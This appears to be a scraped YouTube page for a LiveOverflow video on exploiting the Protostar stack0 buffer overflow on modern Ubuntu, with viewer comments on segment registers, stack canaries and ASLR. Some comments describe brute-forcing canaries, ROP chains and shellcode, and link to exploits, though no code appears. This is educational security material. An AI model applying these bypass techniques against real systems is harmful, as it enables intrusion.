Buffer overflow on a modern system impossible? stack0: part 1 - bin 0x21
ฝัง
- เผยแพร่เมื่อ 6 ก.ค. 2017
- We have a look at stack level 0 from exploit-exercises.com/Protostar and compile it on a current Ubuntu, to see if it's still exploitable.
stack0: liveoverflow.com/binary_hacki...
digitalocean referral:* m.do.co/c/826f195e2288
=[ ❤️ Support ]=
→ per Video: / liveoverflow
→ per Month: / @liveoverflow
=[ 🐕 Social ]=
→ Twitter: / liveoverflow
→ Website: liveoverflow.com/
→ Subreddit: / liveoverflow
→ Facebook: / liveoverflow
=[ 📄 P.S. ]=
All links with "*" are affiliate links.
LiveOverflow / Security Flag GmbH is part of the Amazon Affiliate Partner Programm.
#BinaryExploitation #BufferOverflow
About that FS register.
Segment registers are used to form linear address from a virtual. Virtual address is a full form of addressing, which goes like seg:offset (10:6455, cs:rip). There are six segment registers: cs - code segment, ds - data segment, ss - stack segment, and three additional es, fs, gs. The default data segment is ds, but can be overrided within an opcode prefix to es, fs or gs. Also, the processor fetches the instructions not just from rip, but cs:rip. Same for the stack, it's not rsp, it's ss:rsp.
Those segment registers hold the selector in the global or local descriptor table. Among with the other segment attributes (like current ring) they specify a base and a limit of that segment. Which means you can specify ds to start from linear address 0x10000 and have a limit of 0xffff, so you can address with ds:123 to be pointing to a linear memory at 0x10123, and you can access up to ds:ffff.
This can allow segmenting a program in a single virtual address space.
Modern operating systems don't care about segmentation and use paging for address space separation. So cs, ds, ss describe segments which start at 0 and have a limit of 4 gb - that's full 2^32 of addresses on x86. On x64 segmentation doesn't care about base and limit at all.
But! You have a per-thread structure - a stack, in a hardware it is implemented via using rsp register, right? But what if we need another "more constant" structure for a thread? OS's used TLS or TEB as a separate segment - fs. It's base is selected by the kernel when a thread is created. So every thread can execute smth like mov fs:[0] and be sure that it is pointing to it's private data. x64 even reserved fs and gs registers to be theated specially - they have a non-zero base, it's for the OS's could implement their TLS.
Why exactly fs? Well, ds is defaulted for data fetches, es is reserved for string ops like 'stosb', which should have the same base as ds to operate as we expect. So the next spare segment register is fs. As simple as that. gs may also be used, in fact it is used for x64 TEB on x64 windows, while fs is used for 32-bit TEB for compatibility reasons.
makes sense, pin this?
HonoraryBoT THANK YOU! Never found a good explanation..
Uhh WHAT?
So does that mean if we see fs in the assembly code the compiler is working on a 32 bit system? Thanks for the explanation, it was very helpful!
@@Calm_Energy No. It in no way implies 32-bit code.
It took a lot to get my head around assembly, but now I understand it, it's so easy (within reason)!
how
Your videos are such high quality. Thank you for taking the time to discuss topics thoroughly. I look forward to understanding binary exploitation, thanks to all you've done!
I'm folowing you since month, and i finally make a comment.
This is definitely the BEST stuff I've ever seen.
Thank you so much !
Damn. A whole video answering my question I've asked a couple of month ago on another your video.
Alex Tkachuk same. This guy is awesome. LiveOverflow just became StackOverflow
Well. If we add a bit... i mean a HUGE EGO and a lot of trash talking then it can be close to Stackoverflow. He doesn't have either or at least doesn't show it in vids. He is better than Stackoverflow.
Segmentation registers are used to hold segment selectors wich contain the index that must be used to access the GDT to find the segment information. Three of these registers are special-purpose registers cs, ss and ds (respectively code segment, stack segment and data segment for the current process). The cs register has also the information about the current privilege level. For each of these registers, there is an associated non-programmable register that holds the segment descriptor to avoid the access to the GDT. That offset is summed to the base address of the segment retrieved from the segment descriptor (an entry of the GDT). If I'd made some errors in English I'm sorry.
My professor told me segment registers stores indexes of entry’s in the global descriptor table , and the highest 13 bits are segment selectors and the last 3 bits are CPL
Great video as always! I have so many questions... I might "borrow" your video and talk over it with my questions and where I got confused and see if any charitable soul takes pity on my stupidity and helps my out lol.
Of course first I'll have to try it out for my self.
Keep these videos coming, you're doing a great job bro 👍
what do you mean with "borrow"?
Download and record myself watching it and asking question over it to then upload it and see if you or anyone who watches it can help me out solve my questions. Of course if you don't mind, hope it's ok with you 😇
how about ROP as bin bin 0x22 ? would be the next step in exploitation methinks
great video, really fascinating stuff
also I am amazed that were only talking bypassing the stack canary here, bypassing ASLR is a whole new wolrd of suffering
Segmented registers: In the old days, when computers had segmented memory, these registers would point to various memory segments. CS pointed to code segment, DS data segment, SS stack segment. ES, FS, and GS are just extra general purpose registers. Modern computers don't use segmented memory any more, so these registers are now a days used for paging information, threading information, and other information. Modern computers use flat memory instead of segmented memory. We no longer have DS, ES, or SS in x64! CS, FS, and GS are still here! This is because all modern 64-bit computers use flat memory model.
echt extrem interessanter kanal, viel zu spät entdeckt
2:53 i tried to reorder variable but it does affect the assembler code, and also i noticed that when program ends with exit(0) instead of return 0, then program don't check for stack cookie(if its changed or not) at the end though it declare it on the starting.
Du bist der einzige Mensch bei dem ich Angst habe, dass er aufhört Videos zu machen, weil man dich nicht ersetzten kann ^^
Es hat schon viel zu lange gedauert dich zu finden.
+Max Mustermann thanks
Recommended reading related to this video: www.elttam.com.au/blog/playing-with-canaries/
It explains thoroughly stack canaries on modern Linux and how it can be played with :)
And probably the most comprehensive intro to x86 segmentation: duartes.org/gustavo/blog/post/memory-translation-and-segmentation/
Explained very well, Do you mind telling me what kind of experience you have? Throught out yoyr life possibly? Nothing personal I just want to get an idea, ive been watching more of yoyr videos I find myself spending a lot of time doing so
That intro and outro sound was made by you? If yes then good job! It's really cool and somehow matches the content of the series :P
+AdvSpyL3n nah it's royalty free TH-cam music :)
EDIT: Ohh yea! Found in a reddit post "The End is Near - Gunnar Olsen", it's so cool :O
Yep, it's time to learn assembly.
you know a good teacher when he admits that he doesn't fully understand about a subject instead of pretending he knows. Anyways, I still wish I had 10% of your knowledge 😞
you have interesting videos
64-bit is very hard against any issue, so besides the bruteforcing part it might not even be possible.
Woooop Wooooop nice but would like to see CFG and other windows protection.But enjoyed
the video brings back good memories..
unfortunately I have no clue about windows :S
i don't understand how the integer at ebp -54 is before the buffer at ebp-50 on the stack? In this case isn't it after? The stack grows downward right?
if it is intially reading the stack cookie from "fs:0x28", why do we have to guess it later? can we not just read it from there again? Or will that create a new, random, stack cookie?
I tried checking what it does, but if I try to access fs:0x28 (checked it's the same on my system by disassembling something first), I can't get it to compile, or it segfaults when it gets there :/
(not much experience with assembly language though :p)
wouldn't it make more sense if each buffer had a 'cookie' at the end and if they were all compared
Can you make vid on Page table/ Virtual memory.
Mate, is it possible to code something like this with a GUI for remote access attacks? Looking to code something to put in my GIT, probably way beyond my skills but we have to aim for something ;)
Modern problems requires modern solutions
Nice video! can you do more things like websecurity?
This may be a dumb question, but do you guys think the attack surface for penetration testers is getting smaller as time passes? It seems like there are so many different kinds of protections in place these days that it just keeps getting harder and harder
WorldandWarfare no. Since new technology is being created in great amounts the attack surface increases rapidly. You could ask the same question with malware itself. There are sooo many protection mechanisms against it and way too many big companies focusing on anti virus systems but still, not a single security researcher in the world would (probably ever) say that they beat malware and that there are no security researchers needed.
Also, if you are scared that you won't find any good jobs in that field since they are "not needed anymore" you can relax. There is so much new technology to secure that I would say that it's more likely that a world war will destroy all our technology before we got a chance to protect half of it.
An Ode To C / C++ Thread SAFETY
Static constants abound in the lexical analyzer and compiler. Dynamic linking libraries deploy a plethora of data structures like trees and maps. The linker if static won't undergo modifications by system calls in the appended files at runtime. The loader generates the machine codecs always dynamic in binaries or hexadecimals. The compile time could be automatic or register prompting change in the volatile memory. That makes for thread safe in mutex or deadlock address locations. Any programming languages that are reporting segmentation fault or overflow and overrun are unsafe and need be pontificated for the perverse logic. It could make the operating system crash and the semaphore would rather be rectified to reinstate the infinite loop.
To be clear, you could just debug the application to see what the cookie value is being matched against? That this buffer overflow stuff is just for fun, but far less effective than just debugging.
You don't always have access to debugging informations. Sometimes all you have is input and output like when you're connected to a server application and don't even have local access to the machine. Also when you run a program through a debugger the environment is changed, I had a problem some day with a challenge where I got access to a shell in gdb but I didn't have the rights to read the flag as I should have (I don't know if that's gdb doing that, or some kind of security put up by the admins or in linux) and I don't know how to bypass this (still a newbie).
Anyway : having an exploit work only when debugging makes it really suck as it will work only with local access to the machine + debugging informations available.
I watched one of Gynwael vids, and want to ask if Time based bruteforce of cookie byte by byte is possible on x64, or will it be too fast to record, like if u guess first byte, you try to check second byte, which means, that execution of process is longer, which means you probably guessed first byte right ?
I don't think that it's a notable difference, as it's a simple cmp instruction. Also after it crashes the process is gone, and next execution the cookie will be different.
BUT there are instances of forking servers where a crash doesn't change the cookie because only one child dies, and then you can bruteforce it. if a child doesn't crash, the value was correct.
Read this, section "3.3 - Exploiting canaries remotely" - phrack.org/issues/67/13.html
Also for anyone that's interested I wrote an exploit for a CTF a few months ago that uses this remote brute forcing to guess the security cookie, de-aslr the binary, de-aslr libc, de-aslr the stack, rop chains a call to mprotect and turns off dep before jumping to some shell code. It's all on x64 and I'll more than happily simplify it/explain it if anyone's interested.
github.com/JeffJerseyCow/InsomniHack-CTF-2017
so if you have fs:[0x28] = fs*16 + 0x28
Curious why you would randomize the cookie, if the cookie is already being randomized. Now you have two changing parts instead of one. Wouldn't you be better off keeping your cookie guess static?
Yep
cool bro
How do you want to bruteforce the cookie? It changes on every run of the program so it would only be exploitable if the main function forks into a new process. Or am I missing smth?
+Christian Mehlmauer each run we have a chance of 1 in 16mio to guess the right cookie ;)
haha so let's start a live video of the bruteforcing and see how long it takes :D
can the aslr be exploited using the random exploit :)? may be it's a stupid question but that what comes to my mind right now
... I search on your channel for protostar videos... 😢 But no found
im a nodejs developer
i cant find authentication in socket io using mysql as session store
it will be vulnerable by someone tries to flood the memory of my server due to lack of authentication
pls someone help me
Can someone tell me what program he is using to graphically display the assembly code ?
You mean Binary Ninja?
LiveOverflow yes it is thank you for the quick reply, keep on going the good work
Aren't those "cookies" called "cannaries"?
+Philip Petrov same thing
Making mistakes really needs a programmer which ignores this, I'm ignoring such messages,but my code is most of the time only used by me
oh .. you hook me up
I know it will end up build a rop chain but bypassing the cookie ...
But why 0xffffff in calculator?
just to convert it to decimal
LiveOverflow thanks!
bufferoverflow attack out dated ???
Am I the only one who prefers AT&T syntax?
Yes
lol , nice
not first